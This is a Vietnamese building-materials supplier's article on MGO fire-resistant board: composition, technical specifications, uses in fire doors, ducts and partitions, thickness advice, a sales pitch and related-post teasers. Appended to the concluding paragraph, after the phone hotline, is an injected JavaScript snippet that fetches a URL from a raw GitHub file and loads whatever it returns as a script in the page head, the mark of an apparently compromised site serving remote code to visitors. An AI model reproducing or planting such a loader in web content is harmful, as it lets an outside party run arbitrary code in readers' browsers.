Thông số kỹ thuật của tấm chống cháy MGO

Tấm chống cháy MGO, còn được gọi là tấm Magnesium Oxide, đã trở thành một vật liệu chống cháy phổ biến và được sử dụng rộng rãi trong ngành xây dựng. Với khả năng chống cháy, chống nước và chịu lực tốt, nó đã trở thành lựa chọn hàng đầu cho việc xây dựng các công trình có yêu cầu về an toàn cháy nổ. Tuy nhiên, để hiểu rõ hơn về tấm chống cháy MGO, chúng ta cần tìm hiểu về các thông số kỹ thuật của nó. Trong bài viết này, chúng tôi sẽ cung cấp cho bạn một số thông tin cần thiết, giúp bạn có thể lựa chọn được loại vật liệu phù hợp với công trình của mình.

Thông số kỹ thuật của tấm chống cháy MGO

Thành phần chính của tấm MGO

  • MgO: 45%
  • MgCl2: 15%
  • Đá Perlite (đá trân châu): 5%
  • sợi tổng hợp nhân tạo: 30%
  • Chất phụ gia khác: 5%
  • Thông số kỹ thuật của tấm MGO
  • Dạng tấm kích thước: 1,2×2.4m
  • Độ dày: 5mm-18mm
  • Màu sắc: Trắng
  • Tỷ trọng: 963kg/m³
  • Khả năng chống cháy: A1
  • Hệ số dẫn nhiệt: 0.169 W/(m K)
  • Độ bền uốn khi khô: 18Mp
  • Độ bền uốn khi ẩm: 22Mpa
  • Độ giãn nở khi bị ẩm: 0,26%
  • Tỷ lệ co lại khi gặp nhiệt độ cao: 1,0%
  • Độ thấm nước: Không kết tụ thành giọt nước ở mặt sau
  • Khả năng chịu nhiệt: 1,14m2k / w
  • Cách âm: > 44dB
  • An toàn: 100% an toàn, không chứa amiăng, formaldehyde và benzen

Ứng dụng của tấm chống cháy MGO

Ứng dụng trong sản xuất ống gió: Tấm MGO được sản xuất ống gió với khả năng chống cháy tốt, chống thấm, chống nước, cách nhiệt, không bị ăn mòn, không nứt, không biến dạng.

Sản xuất cửa chống cháy: Nhiệt độ nóng chảy của MGO là 2852°C, điều này giúp cửa chịu lửa tốt, kéo dài thời gian hơn khi có sự cố xảy ra. Khi ở nhiệt độ cao, vật liệu này cũng khó bị giãn nở nên có thể đảm bảo cấu trúc ban đầu của cửa, tăng khả năng chống cháy cho cửa.

Làm vách, tường chống cháy: Sử dụng tấm chống cháy MGO để làm vách – tường chống cháy hiệu quả trong việc giữ cho ngọn lửa không lan rộng sang các khu vực khác. Vách ngăn chống cháy được sử dụng như vách ngăn phòng, vách ngăn hành lang, vách ngăn nhà xưởng, vách ngăn nhà kho…

Gợi ý về cách lựa chọn tấm MGO phù hợp

Đối với cửa thép chống cháy: Cửa thép chống cháy cần có khả năng chịu lửa cao, thường được sử dụng tấm MGO có độ dày từ 10mm trở lên.

Đối với vách ngăn chống cháy: Vách ngăn chống cháy cần ngăn chặn sự lan truyền của đám cháy sang các khu vực khác, thường được sử dụng tấm MGO có độ dày từ 15mm.

Đối với vách ngăn cách âm, cách nhiệt: Vách ngăn cách âm, cách nhiệt cần có khả năng cách âm, cách nhiệt tốt, thường được sử dụng tấm MGO có độ dày từ 10mm trở lên.

Cơ sở cung cấp tấm chống cháy MGO uy tín tại Hải Dương

Vatlieuxaydunguytin là một địa chỉ cung cấp tấm chống cháy MGO uy tín tại Hải Dương và các khu vực lân cận. Với nhiều năm kinh nghiệm trong ngành vật liệu xây dựng, chúng tôi cam kết cung cấp sản phẩm chất lượng và đáng tin cậy cho khách hàng.

Tấm chống cháy MGO là một sản phẩm được sử dụng phổ biến trong ngành xây dựng, đặc biệt là trong các công trình yêu cầu độ an toàn cao. Tấm chống cháy MGO đảm bảo an toàn phòng cháy chữa cháy cho các công trình xây dựng.

Tại Vatlieuxaydunguytin, chúng tôi cung cấp tấm chống cháy MGO với các tiêu chuẩn chất lượng cao, cam kết mang đến cho khách hàng những sản phẩm chất lượng và tuổi thọ cao.

Ngoài ra, chúng tôi luôn đặt sự hài lòng của khách hàng lên hàng đầu. Đội ngũ nhân viên am hiểu về sản phẩm và luôn sẵn sàng tư vấn, hỗ trợ giúp khách hàng có được giải pháp phù hợp với nhu cầu cụ thể của mình.

Kết luận

Trên thị trường hiện nay có rất nhiều đơn vị cung cấp tấm MGO. Khi lựa chọn đơn vị cung cấp, cần lưu ý lựa chọn đơn vị uy tín, có kinh nghiệm và sản phẩm chất lượng. Hãy liên hệ với chúng tôi qua hotline 0983 545 455 để được tư vấn và báo giá ngay hôm nay. (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

Bài viết liên quan

Bí quyết chọn mua khóa tay gạt cửa thép chất lượng cao

Bí quyết chọn mua khóa tay gạt cửa thép chất lượng cao

Trong quá trình hoàn thiện và nâng cấp ngôi nhà, việc chọn mua khóa tay gạt cửa thép chất lượng cao là một yếu tố quan trọng đảm bảo an ninh, thẩm mỹ và sự tiện lợi cho không gian sống. Khóa tay gạt không chỉ là một chi tiết nhỏ, mà còn đóng vai […]

Lợi ích sử dụng bông khoáng trong cách nhiệt mái nhà

Lợi ích sử dụng bông khoáng trong cách nhiệt mái nhà

Trong quá trình xây dựng và cải tạo nhà ở, việc lựa chọn vật liệu cách nhiệt cho mái nhà đóng vai trò vô cùng quan trọng. Đặc biệt tại những khu vực có khí hậu nóng ẩm hoặc lạnh giá, cách nhiệt không chỉ giúp duy trì sự thoải mái trong không gian sống […]

Cách lắp đặt bản lề sàn cho cửa nhôm kính đúng chuẩn

Cách lắp đặt bản lề sàn cho cửa nhôm kính đúng chuẩn

Cửa nhôm kính là một trong những lựa chọn phổ biến cho các công trình hiện đại bởi tính thẩm mỹ cao, khả năng cách âm và cách nhiệt tốt. Để đảm bảo cửa nhôm kính hoạt động hiệu quả và bền bỉ, việc lắp đặt bản lề sàn đúng chuẩn là vô cùng quan […]

Làm thế nào để chọn phụ kiện cửa nhôm phù hợp với các loại cửa?

Làm thế nào để chọn phụ kiện cửa nhôm phù hợp với các loại cửa?

Khi thiết kế hoặc cải tạo không gian sống, việc lựa chọn phụ kiện cửa nhôm phù hợp không chỉ là vấn đề về thẩm mỹ mà còn ảnh hưởng trực tiếp đến tính năng và hiệu quả sử dụng của cửa. Phụ kiện cửa nhôm bao gồm nhiều thành phần như bản lề, khóa, […]

Cách chọn tay co thủy lực phù hợp với mỗi loại cửa

Cách chọn tay co thủy lực phù hợp với mỗi loại cửa

Tay co thủy lực hay còn gọi là tay đẩy hơi, là một phụ kiện quan trọng trong việc đảm bảo an toàn và sự tiện lợi cho các loại cửa trong công trình xây dựng hiện đại. Không chỉ giúp cửa tự động đóng lại sau khi mở, tay co thủy lực còn có […]

Vật liệu chống cháy: Giải pháp tiết kiệm chi phí dài hạn

Vật liệu chống cháy: Giải pháp tiết kiệm chi phí dài hạn

Trong bối cảnh hiện đại, sự an toàn của con người và tài sản là yếu tố được đặt lên hàng đầu trong bất kỳ công trình xây dựng nào. Để đảm bảo tính mạng và tài sản trước nguy cơ cháy nổ, việc sử dụng các vật liệu chống cháy trong xây dựng không […]